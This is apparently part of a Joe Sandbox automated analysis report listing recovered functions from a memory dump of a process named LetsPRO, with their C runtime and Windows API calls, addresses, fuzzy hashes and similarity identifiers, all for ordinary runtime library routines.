                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • _CxxThrowException.MSVCR100(?,6C9A0D2C), ref: 6C938FF4
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C939012
                                        • SetEvent.KERNEL32(?), ref: 6C93905D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_osCopy_strEventExceptionThrowstd::exception::_std::exception::exception
                                        • String ID:
                                        • API String ID: 1689211050-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C942273
                                        • _CxxThrowException.MSVCR100(?,6C9A0EC8), ref: 6C942288
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9422AE
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9422C7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_os$ExceptionThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 3087931431-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID:
                                        • API String ID: 168861036-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C9466A2
                                        • GetLastError.KERNEL32 ref: 6C9466AF
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C9466C7
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C9466D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionLastThrow
                                        • String ID:
                                        • API String ID: 1394060424-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C68
                                        • _wcslen.LIBCMT(00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C7B
                                        • _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C910C98
                                        • ___mbtow_environ.LIBCMT ref: 6C9308D4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Similarity
                                        • API ID: _wcslen$___mbtow_environ_wcsnicoll
                                        • String ID:
                                        • API String ID: 3727037093-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C9421E3
                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • _CxxThrowException.MSVCR100(6C933AC0,6C9A0EAC,?), ref: 6C9421F8
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(?,6C933AC0,6C9A0EAC,?), ref: 6C942200
                                        • std::exception::exception.LIBCMT(?), ref: 6C94222D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _fileno.MSVCR100(?,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F41
                                        • _lseek.MSVCR100(00000000,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F48
                                        • _errno.MSVCR100(?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C928D6F
                                        • _ftell_nolock.MSVCR100(?,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C928D83
                                          • Part of subcall function 6C90A5D5: _fileno.MSVCR100(?,?,?,?,?,?,?,6C90A870,?), ref: 6C90A604
                                          • Part of subcall function 6C90A5D5: _write.MSVCR100(00000000,?,?,?,?,?,?,6C90A870,?), ref: 6C90A60B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C94040A
                                          • Part of subcall function 6C93B397: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6C93B3B9
                                        • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6C9A55E0,0000000C,6C9403B2,?,?,?,6C9361DE,?,6C9454B2,00000004,6C945DD3,?,?,00000000), ref: 6C94044D
                                        • memcpy.MSVCR100(?,?,00000024,6C9A55E0,0000000C,6C9403B2,?,?,?,6C9361DE,?,6C9454B2,00000004,6C945DD3,?,?), ref: 6C940468
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,6C9454B2,00000004,6C945DD3,?,?,00000000,?,?,?,6C945CDB,00000001), ref: 6C940492
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D42
                                        • _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D51
                                        • __fassign.LIBCMT(00000000,00000000,00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D6D
                                        • ___wtomb_environ.LIBCMT ref: 6C93087E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C94ABEA: GetCurrentThreadId.KERNEL32 ref: 6C94AC12
                                          • Part of subcall function 6C94ABEA: swprintf.LIBCMT(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6C94A994,?,?,000000F8), ref: 6C94AC3C
                                          • Part of subcall function 6C94ABEA: vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC5E
                                          • Part of subcall function 6C94ABEA: _wcslen.LIBCMT(?,00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC64
                                        • _fwprintf.LIBCMT(6C9A3048,?), ref: 6C94AA11
                                          • Part of subcall function 6C9548FC: _errno.MSVCR100(6C954988,0000000C,6C94A882,?), ref: 6C954918
                                          • Part of subcall function 6C9548FC: _invalid_parameter_noinfo.MSVCR100(6C954988,0000000C,6C94A882,?), ref: 6C954923
                                        • __aullrem.LIBCMT ref: 6C94AA28
                                        • fflush.MSVCR100(00000032,00000000), ref: 6C94AA45
                                          • Part of subcall function 6C90EED1: _lock_file.MSVCR100(?,6C90EF18,0000000C), ref: 6C90EEEB
                                          • Part of subcall function 6C90EED1: _fflush_nolock.MSVCR100(?,6C90EF18,0000000C), ref: 6C90EEF7
                                        • OutputDebugStringW.KERNEL32(?), ref: 6C94AA54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Similarity
                                        • API ID: _errno_memset_msizerealloc
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(00000000,00000000), ref: 6C92AAD5
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000), ref: 6C92AAE0
                                        • _errno.MSVCR100(00000000,00000000,00000000), ref: 6C92AAE9
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000), ref: 6C92AAF4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C9387BA
                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • _CxxThrowException.MSVCR100(?,6C9A0D2C), ref: 6C9387CF
                                        • TlsGetValue.KERNEL32(?), ref: 6C9387E0
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9387F8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C9403E6: TlsGetValue.KERNEL32(6C945C13,?,00000000,?,6C935CE7,00000001), ref: 6C9403EC
                                        • SetEvent.KERNEL32(?), ref: 6C938D50
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C938D62
                                          • Part of subcall function 6C936BA8: _memset.LIBCMT(?,00000000,0000003E,00000002,?), ref: 6C936BC7
                                        • _CxxThrowException.MSVCR100(?,6C9A0D80), ref: 6C938D70
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C938D78
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6C947DED
                                        • GetLastError.KERNEL32(?,00000000,00000000), ref: 6C947DFA
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6C947E12
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,00000000,00000000), ref: 6C947E20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6C937E80
                                          • Part of subcall function 6C937483: CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C9374AB
                                          • Part of subcall function 6C937483: std::exception::exception.LIBCMT(?,00000001,00000001,?,?,00000000), ref: 6C937504
                                          • Part of subcall function 6C937483: _CxxThrowException.MSVCR100(F3B6147F,6C90C8D8,?,00000001,00000001,?,?,00000000), ref: 6C937519
                                        • GetLastError.KERNEL32 ref: 6C937E8D
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6C937E9F
                                        • DeleteTimerQueueTimer.KERNEL32(00000000,?,00000000), ref: 6C937EA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _strlen.LIBCMT(00000001,?,00000000,00000000,?,6C94C950,?,00000000,00000001,6C9A7C68), ref: 6C915BEF
                                        • malloc.MSVCR100(00000001,00000001,?,00000000,00000000,?,6C94C950,?,00000000,00000001,6C9A7C68), ref: 6C915BF8
                                          • Part of subcall function 6C900263: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537), ref: 6C900293
                                        • strcpy_s.MSVCR100(00000000,00000001,00000001,?,00000000,00000000,?,6C94C950,?,00000000,00000001,6C9A7C68), ref: 6C915C0A
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,00000001,6C9A7C68), ref: 6C929674
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C9403E6: TlsGetValue.KERNEL32(6C945C13,?,00000000,?,6C935CE7,00000001), ref: 6C9403EC
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,00000000), ref: 6C940B10
                                          • Part of subcall function 6C9381C4: std::exception::exception.LIBCMT(00000000,00000000,?,?,6C940B15,?), ref: 6C9381D8
                                        • _CxxThrowException.MSVCR100(?,6C9A0E68,?,00000000,?,?,?,00000000), ref: 6C940B1E
                                          • Part of subcall function 6C918728: RaiseException.KERNEL32(?,?,6C92F35F,?,?,?,?,?,6C92F35F,?,6C90C8D8,6C9A8518), ref: 6C918767
                                        • TlsSetValue.KERNEL32(00000000), ref: 6C940B39
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,00000000), ref: 6C940B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C947981: GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C94799E
                                          • Part of subcall function 6C947981: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6C94793E,00000000,?), ref: 6C9479B6
                                          • Part of subcall function 6C947981: _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,6C94793E,00000000,?), ref: 6C9479C4
                                          • Part of subcall function 6C947981: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,6C94793E,00000000,?), ref: 6C9479D0
                                          • Part of subcall function 6C947981: GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C9479DD
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,00000000,?), ref: 6C947943
                                        • GetLastError.KERNEL32 ref: 6C947950
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947968
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C947976
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEventExceptionThrow
                                        • String ID:
                                        • API String ID: 1718773336-0
                                        • Opcode ID: b656ed46aa21730e0d14d2f84103b1920338b59ad720e56c7a163ea23d640d4a
                                        • Instruction ID: a7a133dc51c82e705dbad33159694c55ad451780aaaf28817c5e631824e110e8
                                        • Opcode Fuzzy Hash: b656ed46aa21730e0d14d2f84103b1920338b59ad720e56c7a163ea23d640d4a
                                        • Instruction Fuzzy Hash: 23014BB1900315AFC7209FAA88C499AFBF8FF183447558E3EE15AD3A50D775E808CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,?,6C952B6B,?,000000FF,?,00000000,00000000), ref: 6C952A02
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6C952B6B,?,000000FF,?,00000000,00000000), ref: 6C952A0D
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C952A51
                                        • free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C952A59
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4554520-0
                                        • Opcode ID: e80cc2dfc1146a7c6da0b345b41f21ad2af8333d70eb10c7ad21b21c382317bd
                                        • Instruction ID: c58ccbc3861f1b40cf36a7d869ee2fa9f9745219d2f691fd12216e9cf8780e7a
                                        • Opcode Fuzzy Hash: e80cc2dfc1146a7c6da0b345b41f21ad2af8333d70eb10c7ad21b21c382317bd
                                        • Instruction Fuzzy Hash: 1E016D7590010CFBCF129FA0CC05ADD7EB9AF24368F504294B928655A0E772CBA8DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C90C6C0
                                        • __AdjustPointer.MSVCR100(00000000,?,00000004,6C90C7E1,00000000,?), ref: 6C90C6EF
                                        • __AdjustPointer.MSVCR100(00000000,?,00000001,00000004,6C90C7E1,00000000,?), ref: 6C927237
                                        • memcpy.MSVCR100(?,00000000,00000003,00000004,6C90C7E1,00000000,?,?,?), ref: 6C92725D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                        • String ID:
                                        • API String ID: 738859832-0
                                        • Opcode ID: 7d160b8d0277770baa52a24df5aab3fb1358a465d1925dac0dcebe0ee08ed037
                                        • Instruction ID: 82b17f75f0ad46cad1f53a62c6afdad713d20f301c21b946763f7b88aef2760a
                                        • Opcode Fuzzy Hash: 7d160b8d0277770baa52a24df5aab3fb1358a465d1925dac0dcebe0ee08ed037
                                        • Instruction Fuzzy Hash: C9016D72104204BEEF21AF10DC41BDA7BB9EF20328F108419F95065A70CB72E9A9DB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32(00000000,6C9308C6,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912342
                                        • _malloc_crt.MSVCR100(00000002,?,?,?,6C910D07,?,6C910D28,0000000C), ref: 6C912371
                                        • memcpy.MSVCR100(00000000,00000000,00000002,?,?,?,6C910D07,?,6C910D28,0000000C), ref: 6C912380
                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,6C910D07,?,6C910D28,0000000C), ref: 6C912389
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$Free_malloc_crtmemcpy
                                        • String ID:
                                        • API String ID: 202606007-0
                                        • Opcode ID: a82f9f74254e62f80912cee5b8e75beefc050de4acfcabda1637ea984e884bf2
                                        • Instruction ID: 9424ec57135a4b8b425366c8317d803e0652b56f4979b6618009761369ba3805
                                        • Opcode Fuzzy Hash: a82f9f74254e62f80912cee5b8e75beefc050de4acfcabda1637ea984e884bf2
                                        • Instruction Fuzzy Hash: 3CF0827BA095555ACB247B75BC4A897273CDFD3AAC31E0529E415C3E40EA70CA46C2E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32 ref: 6C947D21
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947D39
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C947D47
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C947D54
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow
                                        • String ID:
                                        • API String ID: 2208055260-0
                                        • Opcode ID: 6a27a3c7086cf7d5753361e4db0f35f37ccbdd6c9cf1baa997a990aca9c1933d
                                        • Instruction ID: 51a4f39d494eff22599390b9a2547aaac02023ce1b85efe2780aec085230a610
                                        • Opcode Fuzzy Hash: 6a27a3c7086cf7d5753361e4db0f35f37ccbdd6c9cf1baa997a990aca9c1933d
                                        • Instruction Fuzzy Hash: 1D0186B1A102599BCB14DFB4DC00ADE77B8BF65348B108529E415E7640DB38D605CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateThread.KERNEL32(00000000,-00000018,6C940F33,00010000,6C940F21,?), ref: 6C94AB8D
                                        • GetLastError.KERNEL32 ref: 6C94AB97
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94ABAF
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94ABBD
                                          • Part of subcall function 6C94AAC4: GetModuleHandleA.KERNEL32(00000000), ref: 6C94AADB
                                          • Part of subcall function 6C94AAC4: GetModuleFileNameW.KERNEL32(6C8F0000,?,00000104), ref: 6C94AAF7
                                          • Part of subcall function 6C94AAC4: LoadLibraryW.KERNEL32(?), ref: 6C94AB08
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
                                        • String ID:
                                        • API String ID: 488853443-0
                                        • Opcode ID: 408bcf82d2db14e782ac06f89993e8c6ef3df295e9b8c6711677d35918d7e1a5
                                        • Instruction ID: 24488759bb4cdc0d29ebe7719d2debba68e3c77c5d6d869a7b38a5b201e6a4f2
                                        • Opcode Fuzzy Hash: 408bcf82d2db14e782ac06f89993e8c6ef3df295e9b8c6711677d35918d7e1a5
                                        • Instruction Fuzzy Hash: 0EF0C2312002459BDF099FA48C06AAE3B29EF14348F14803DF516D5950DF35C8169B99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9480C9
                                          • Part of subcall function 6C94911B: InterlockedFlushSList.KERNEL32(?,?,6C9480EB,00000000,6C948E54,00000000,?,?,00000100), ref: 6C949136
                                        • CloseHandle.KERNEL32(?,00000000,6C948E54,00000000,?,?,00000100), ref: 6C9480FC
                                        • CloseHandle.KERNEL32(?,00000000,6C948E54,00000000,?,?,00000100), ref: 6C948109
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,00000000,6C948E54,00000000,?,?,00000100), ref: 6C94812E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@FlushH_prolog3InterlockedList
                                        • String ID:
                                        • API String ID: 3972622424-0
                                        • Opcode ID: 3e5723349a8843b1fb6682352d50d1b2bfa7126777e2a4ade26a87389ae5c000
                                        • Instruction ID: 3d9d2fe70620424942e41a1c9677862f9392e4ab69721048b04a67a8823f6d96
                                        • Opcode Fuzzy Hash: 3e5723349a8843b1fb6682352d50d1b2bfa7126777e2a4ade26a87389ae5c000
                                        • Instruction Fuzzy Hash: BB018170701701EBDB149BB5C891F9EB3B8BF69218F10880DE465EBB40CB34EA058BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _strnlen.LIBCMT(?,00007FFF,6C911D08,00000010), ref: 6C911CC1
                                        • _lock.MSVCR100(00000007,6C911D08,00000010), ref: 6C911CD6
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D42
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D51
                                          • Part of subcall function 6C911D24: __fassign.LIBCMT(00000000,00000000,00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D6D
                                          • Part of subcall function 6C911C93: _unlock.MSVCR100(00000007,6C911CF8,6C911D08,00000010), ref: 6C911C95
                                        • _errno.MSVCR100(6C911D08,00000010), ref: 6C93089E
                                        • _invalid_parameter_noinfo.MSVCR100(6C911D08,00000010), ref: 6C9308A9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _strlen$CriticalEnterSection__fassign_errno_invalid_parameter_noinfo_lock_strnlen_unlock
                                        • String ID:
                                        • API String ID: 3718102437-0
                                        • Opcode ID: 40c6823a48eb33a4d1fb8044dc05ce50eb1b84a7b55b03aa9e9d2d0354ca08a3
                                        • Instruction ID: ce371ebb04375524b96b83b4f534c1d2e30ec9d6fb11a9e04615d9c1ba866a6e
                                        • Opcode Fuzzy Hash: 40c6823a48eb33a4d1fb8044dc05ce50eb1b84a7b55b03aa9e9d2d0354ca08a3
                                        • Instruction Fuzzy Hash: 96F09631E0920EFAEB105F70DC027DD3AA0AF71328F2064789418D9AD0DF35D5848654
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock_file.MSVCR100(?,6C911EE0,0000000C), ref: 6C911EA8
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fseek_nolock.MSVCR100(?,?,?,6C911EE0,0000000C), ref: 6C911EB9
                                          • Part of subcall function 6C911EFC: _fileno.MSVCR100(?,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F41
                                          • Part of subcall function 6C911EFC: _lseek.MSVCR100(00000000,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F48
